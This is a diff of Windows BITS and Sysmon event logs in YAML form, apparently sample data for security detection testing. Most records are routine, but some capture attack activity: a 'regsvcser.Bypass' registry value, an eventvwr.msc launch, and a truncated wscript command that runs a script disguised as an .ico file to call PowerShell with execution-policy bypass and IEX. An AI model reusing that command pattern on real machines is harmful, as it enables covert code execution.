- Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T11:50:02.661365Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T11:50:02.661365Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 @@ -66,35 +59,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A + Correlation_attributes: + ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A EventID: 60 EventRecordID: 8200 - Execution: - "#attributes": - ProcessID: 4964 - ThreadID: 368 + Execution_attributes: + ProcessID: 4964 + ThreadID: 368 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T11:50:15.796214Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T11:50:15.796214Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 bytesTotal: 25802496 @@ -109,35 +97,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 + Correlation_attributes: + ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 EventID: 59 EventRecordID: 8206 - Execution: - "#attributes": - ProcessID: 4028 - ThreadID: 908 + Execution_attributes: + ProcessID: 4028 + ThreadID: 908 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T12:32:08.987914Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T12:32:08.987914Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 @@ -159,35 +142,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 + Correlation_attributes: + ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 EventID: 60 EventRecordID: 8222 - Execution: - "#attributes": - ProcessID: 4028 - ThreadID: 6308 + Execution_attributes: + ProcessID: 4028 + ThreadID: 6308 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T12:36:06.775288Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T12:36:06.775288Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 20160230-2E6F-428A-A61F-20740628577B bytesTotal: 2014464 @@ -202,35 +180,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE + Correlation_attributes: + ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE EventID: 59 EventRecordID: 8448 - Execution: - "#attributes": - ProcessID: 2788 - ThreadID: 948 + Execution_attributes: + ProcessID: 2788 + ThreadID: 948 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:55:59.769081Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:55:59.769081Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 20160230-2E6F-428A-A61F-20740628577B @@ -252,35 +225,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE + Correlation_attributes: + ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE EventID: 60 EventRecordID: 8449 - Execution: - "#attributes": - ProcessID: 2788 - ThreadID: 9108 + Execution_attributes: + ProcessID: 2788 + ThreadID: 9108 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:56:21.668986Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:56:21.668986Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D bytesTotal: 1708800 @@ -295,35 +263,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 + Correlation_attributes: + ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 EventID: 59 EventRecordID: 8530 - Execution: - "#attributes": - ProcessID: 7344 - ThreadID: 3400 + Execution_attributes: + ProcessID: 7344 + ThreadID: 3400 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-05T10:55:56.114648Z" + TimeCreated_attributes: + SystemTime: "2020-11-05T10:55:56.114648Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D @@ -345,35 +308,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 + Correlation_attributes: + ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 EventID: 60 EventRecordID: 8531 - Execution: - "#attributes": - ProcessID: 7344 - ThreadID: 9012 + Execution_attributes: + ProcessID: 7344 + ThreadID: 9012 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-05T10:56:12.615763Z" + TimeCreated_attributes: + SystemTime: "2020-11-05T10:56:12.615763Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 bytesTotal: 2603264 @@ -388,35 +346,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 + Correlation_attributes: + ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 EventID: 59 EventRecordID: 8833 - Execution: - "#attributes": - ProcessID: 4908 - ThreadID: 4660 + Execution_attributes: + ProcessID: 4908 + ThreadID: 4660 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-12T10:56:13.148615Z" + TimeCreated_attributes: + SystemTime: "2020-11-12T10:56:13.148615Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 @@ -438,35 +391,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 + Correlation_attributes: + ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 EventID: 60 EventRecordID: 8834 - Execution: - "#attributes": - ProcessID: 4908 - ThreadID: 5396 + Execution_attributes: + ProcessID: 4908 + ThreadID: 5396 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-12T10:57:10.415576Z" + TimeCreated_attributes: + SystemTime: "2020-11-12T10:57:10.415576Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 6BFD2AD8-963A-4E3D-A596-DDB00305910F bytesTotal: 22209280 @@ -481,35 +429,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD + Correlation_attributes: + ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD EventID: 59 EventRecordID: 8971 - Execution: - "#attributes": - ProcessID: 8076 - ThreadID: 368 + Execution_attributes: + ProcessID: 8076 + ThreadID: 368 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-18T21:49:57.232015Z" + TimeCreated_attributes: + SystemTime: "2020-11-18T21:49:57.232015Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 6BFD2AD8-963A-4E3D-A596-DDB00305910F @@ -531,35 +474,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD + Correlation_attributes: + ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD EventID: 60 EventRecordID: 8972 - Execution: - "#attributes": - ProcessID: 8076 - ThreadID: 8756 + Execution_attributes: + ProcessID: 8076 + ThreadID: 8756 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-18T21:53:25.998024Z" + TimeCreated_attributes: + SystemTime: "2020-11-18T21:53:25.998024Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 bytesTotal: 1304160 @@ -574,35 +512,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 + Correlation_attributes: + ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 EventID: 59 EventRecordID: 9404 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 4424 + Execution_attributes: + ProcessID: 8100 + ThreadID: 4424 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T18:55:38.049422Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T18:55:38.049422Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 @@ -624,35 +557,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 + Correlation_attributes: + ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 EventID: 60 EventRecordID: 9405 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 5972 + Execution_attributes: + ProcessID: 8100 + ThreadID: 5972 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T18:55:51.603329Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T18:55:51.603329Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 bytesTotal: 44403064 @@ -667,35 +595,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C + Correlation_attributes: + ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C EventID: 59 EventRecordID: 9408 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 4396 + Execution_attributes: + ProcessID: 8100 + ThreadID: 4396 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T19:01:32.985061Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T19:01:32.985061Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 @@ -717,35 +640,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C + Correlation_attributes: + ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C EventID: 61 EventRecordID: 9409 - Execution: - "#attributes": - ProcessID: 8100 - ThreadID: 3656 + Execution_attributes: + ProcessID: 8100 + ThreadID: 3656 Keywords: "0x4000000000000000" Level: 3 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2021-03-15T19:29:05.990760Z" + TimeCreated_attributes: + SystemTime: "2021-03-15T19:29:05.990760Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: regsvcser.Bypass EventType: SetValue @@ -761,30 +679,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 3622 - Execution: - "#attributes": - ProcessID: 2796 - ThreadID: 3592 + Execution_attributes: + ProcessID: 2796 + ThreadID: 3592 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-07-19T14:46:20.787648Z" + TimeCreated_attributes: + SystemTime: "2019-07-19T14:46:20.787648Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: regsvcser.Bypass EventType: SetValue @@ -800,30 +714,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 3626 - Execution: - "#attributes": - ProcessID: 2796 - ThreadID: 3592 + Execution_attributes: + ProcessID: 2796 + ThreadID: 3592 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-07-19T14:46:20.830945Z" + TimeCreated_attributes: + SystemTime: "2019-07-19T14:46:20.830945Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue @@ -839,30 +749,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424060 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:57:36.375368Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:57:36.375368Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue @@ -878,30 +784,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424064 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:57:36.376024Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:57:36.376024Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue @@ -917,30 +819,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424244 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:58:21.930237Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:58:21.930237Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000001) EventType: SetValue @@ -956,30 +854,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 424248 - Execution: - "#attributes": - ProcessID: 3208 - ThreadID: 4804 + Execution_attributes: + ProcessID: 3208 + ThreadID: 4804 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:58:21.931190Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:58:21.931190Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" " Company: Microsoft Corporation @@ -1008,30 +902,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 15 - Execution: - "#attributes": - ProcessID: 3192 - ThreadID: 3288 + Execution_attributes: + ProcessID: 3192 + ThreadID: 3288 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-04-18T16:57:04.681038Z" + TimeCreated_attributes: + SystemTime: "2019-04-18T16:57:04.681038Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: EventType: CreateKey Image: "C:\\Windows\\system32\\reg.exe" @@ -1046,30 +936,26 @@ Event: Correlation: ~ EventID: 12 EventRecordID: 18618 - Execution: - "#attributes": - ProcessID: 1780 - ThreadID: 2204 + Execution_attributes: + ProcessID: 1780 + ThreadID: 2204 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 12 - TimeCreated: - "#attributes": - SystemTime: "2019-05-16T14:17:15.763712Z" + TimeCreated_attributes: + SystemTime: "2019-05-16T14:17:15.763712Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: DWORD (0x00000000) EventType: SetValue @@ -1085,30 +971,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 18619 - Execution: - "#attributes": - ProcessID: 1780 - ThreadID: 2204 + Execution_attributes: + ProcessID: 1780 + ThreadID: 2204 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-05-16T14:17:15.763712Z" + TimeCreated_attributes: + SystemTime: "2019-05-16T14:17:15.763712Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX 